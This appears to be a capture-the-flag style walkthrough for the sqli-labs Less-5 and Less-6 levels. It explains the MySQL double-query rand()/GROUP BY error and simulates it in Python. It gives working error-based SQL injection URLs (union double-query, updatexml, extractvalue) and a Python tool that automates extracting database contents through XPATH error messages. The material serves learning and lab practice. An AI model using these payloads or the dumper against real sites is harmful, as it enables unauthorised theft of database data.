Reading the explanation in another blog (https://mochazz.github.io/2017/09/23/Double_%20SQL_Injection/#0x01-%E5%8F%8C%E6%9F%A5%E8%AF%A2) gave me my own understanding of this. The error is not caused by an "aggregate function" as such: it comes from combining count(*), GROUP BY and a grouping key built from rand() in one query, so that rand() is evaluated more than once per row.
First look at the query: SELECT count(*),concat((SELECT database()),"~",floor(rand()*2))as a FROM test GROUP BY a;
When MySQL runs count(*) with GROUP BY a it builds a temporary table keyed on a. The value of a depends on floor(rand()*2): rand() returns a random float in [0,1), floor() truncates it, so floor(rand()*2) can only be 0 or 1. The trick is that MySQL evaluates the key expression more than once per row: once to look the key up in the temporary table, and again when the key is missing and the row has to be inserted. Whether the error fires therefore depends on the number of rows in test. With rand(0) the sequence of floor(rand(0)*2) is fixed (0, 1, 1, 0, 1, 1, ...), so three rows are enough: row 1 evaluates to 0 (not found), is re-evaluated to 1 and inserted as key "<db>~1"; row 2 evaluates to 1 (found, count incremented); row 3 evaluates to 0 (not found), is re-evaluated to 1 and inserted again, which fails with "Duplicate entry '<db>~1' for key 'group_key'" (the key name varies between MySQL versions) and the database name shows up inside the error text. With an unseeded rand() the collision is only probable, so the query may have to be repeated; the usual recipe is rand(0) plus a table with at least three rows.
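To make the "three rows are enough" claim concrete, here is an added example (not code from the original post or from sqli-labs) that re-implements MySQL's RAND() generator in Python (the my_rnd linear congruential generator from mysys/my_rnd.cc, seeded the way Item_func_rand seeds RAND(0)) and simulates the GROUP BY temporary table, evaluating the key once for the lookup and once more for the insert. The prefix "security" stands in for the leaked database() value and is an assumption.

```python
# Added example: simulate MySQL's RAND(0) and the double evaluation of the
# GROUP BY key that produces "Duplicate entry ... for key 'group_key'".
# Not part of the original post; "security" is an assumed database name.

MAX_RAND = 0x3FFFFFFF  # my_rnd's max_value


class MySQLRand:
    """MySQL RAND(seed) for an integer seed (mysys/my_rnd.cc LCG)."""

    def __init__(self, seed: int):
        # Item_func_rand::seed_random: randominit(tmp*0x10001+55555555, tmp*0x10000001)
        seed1 = (seed * 0x10001 + 55555555) & 0xFFFFFFFF
        seed2 = (seed * 0x10000001) & 0xFFFFFFFF
        self.seed1 = seed1 % MAX_RAND
        self.seed2 = seed2 % MAX_RAND

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_RAND
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_RAND
        return self.seed1 / MAX_RAND


def floor_rand_sequence(seed: int, n: int) -> list:
    """floor(rand(seed)*2) for n consecutive evaluations inside one statement."""
    r = MySQLRand(seed)
    return [int(r.next() * 2) for _ in range(n)]


def simulate_group_by(row_count: int, seed: int = 0, prefix: str = "security"):
    """
    Simulate SELECT count(*), concat(prefix, floor(rand(seed)*2)) AS a ... GROUP BY a
    over row_count rows. Returns ("ok", temp_table) or ("error", message).
    """
    r = MySQLRand(seed)
    temp_table = {}
    for _ in range(row_count):
        key = f"{prefix}{int(r.next() * 2)}"  # first evaluation: look the key up
        if key in temp_table:
            temp_table[key] += 1
            continue
        key = f"{prefix}{int(r.next() * 2)}"  # missing: evaluated again for the insert
        if key in temp_table:
            return "error", f"Duplicate entry '{key}' for key 'group_key'"
        temp_table[key] = 1
    return "ok", temp_table


if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand_sequence(0, 12))
    for rows in (1, 2, 3):
        print(rows, "rows ->", simulate_group_by(rows))
```

Two rows build the temporary table without a collision; the third row is the one whose re-evaluated key already exists, and the prefix (the leaked value) is echoed in the error message. Run it with a different seed to see that the guarantee is specific to the fixed rand(0) sequence.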
Less-5 payloads (Less-5 wraps id in single quotes and prints MySQL errors, which is what all three rely on):
Double-query version. The injected SELECT has three columns to match the original query, and information_schema.tables has far more than the three rows rand(0) needs, so the Duplicate entry error fires reliably with the database name inside it:
http://10.9.2.81/Less-5/?id=1' union select 1,count(*),concat((select database()),floor(rand(0)*2)) as a from information_schema.tables group by a;--+
updatexml version. The XPath syntax error echoes the second argument back; 0x7e (~) at the front guarantees the string is never valid XPath and marks where the data starts:
http://10.9.2.81/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) --+
extractvalue version, same idea with a two-argument function:
http://10.9.2.81/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
Note that the XPATH syntax error shows at most 32 characters (the ~ counts as one), so a longer group_concat() result has to be paged through with substr().
Less-6 payloads (same as Less-5, but id is wrapped in double quotes, so the injection closes with " instead of '; the browser sends " and spaces as %22 and %20, shown decoded here):
http://10.9.2.81/Less-6/?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
http://10.9.2.81/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+
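The Less-5 and Less-6 updatexml/extractvalue payloads above differ only in the closing quote, and both hit the 32-character cap of the XPATH error text. The following added example (not code from the original post or from sqli-labs) builds those payloads for either level, pages through the leaked value 31 characters at a time with substr(), and parses the leaked fragment out of the response. The host 10.9.2.81 is taken from the page; the fake_server() stand-in, its column list and the error-page HTML are constructed so the example runs offline.

```python
# Added example: error-based (updatexml/extractvalue) payload builder with
# 31-character paging and an error-message parser. Not from the original post;
# fake_server() is a constructed stand-in for the sqli-labs app.
import re
from urllib.parse import quote, unquote

# Quote character that closes the id value in each level: Less-5 id='1', Less-6 id="1"
QUOTE = {"Less-5": "'", "Less-6": '"'}
# The XPATH syntax error shows at most 32 characters and one of them is the
# 0x7e marker, so each query can leak 31 characters of the target value.
LEAK_CHARS = 31
ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def payload(level, subquery, func="updatexml", offset=1):
    """Build the payload for one 31-character window of subquery's result."""
    window = f"substr(({subquery}),{offset},{LEAK_CHARS})"
    expr = f"concat(0x7e,{window})"  # '~' makes the string invalid XPath
    if func == "updatexml":
        call = f"updatexml(1,{expr},1)"
    elif func == "extractvalue":
        call = f"extractvalue(1,{expr})"
    else:
        raise ValueError(f"unknown function {func!r}")
    return f"1{QUOTE[level]} and {call} --+"


def build_url(level, subquery, base="http://10.9.2.81", **kw):
    # '+' is kept literal: the server decodes it to the space that closes '-- '
    return f"{base}/{level}/?id=" + quote(payload(level, subquery, **kw), safe="+()',=~")


def extract_leak(body):
    """Return the leaked fragment from a response body, or None without an XPATH error."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def dump(fetch, level, subquery, func="updatexml"):
    """Page through the target value with increasing substr() offsets."""
    out, offset = "", 1
    while True:
        chunk = extract_leak(fetch(build_url(level, subquery, func=func, offset=offset)))
        if not chunk:
            break
        out += chunk
        if len(chunk) < LEAK_CHARS:  # short window: end of the value
            break
        offset += LEAK_CHARS
    return out


# --- constructed stand-in for the vulnerable app so the example runs offline ---
def fake_server(secret):
    """Return a fetch(url) that answers like sqli-labs would if the subquery yielded `secret`."""
    win_re = re.compile(r"substr\(\(.*?\),(\d+),(\d+)\)")

    def fetch(url):
        m = win_re.search(unquote(url))
        start, length = int(m.group(1)), int(m.group(2))
        fragment = secret[start - 1:start - 1 + length]
        return f"<font color=red>XPATH syntax error: '~{fragment}'</font>"

    return fetch


if __name__ == "__main__":
    columns = "id,username,password"  # constructed sample result of the subquery
    q = "select group_concat(column_name) from information_schema.columns where table_name='users'"
    print(build_url("Less-6", q, func="extractvalue"))
    print(dump(fake_server(columns), "Less-5", q))
```

Against the real target, replace fake_server() with a function that performs the GET and returns the body; the paging loop stops on the first window shorter than 31 characters, so the result length does not need to be known in advance.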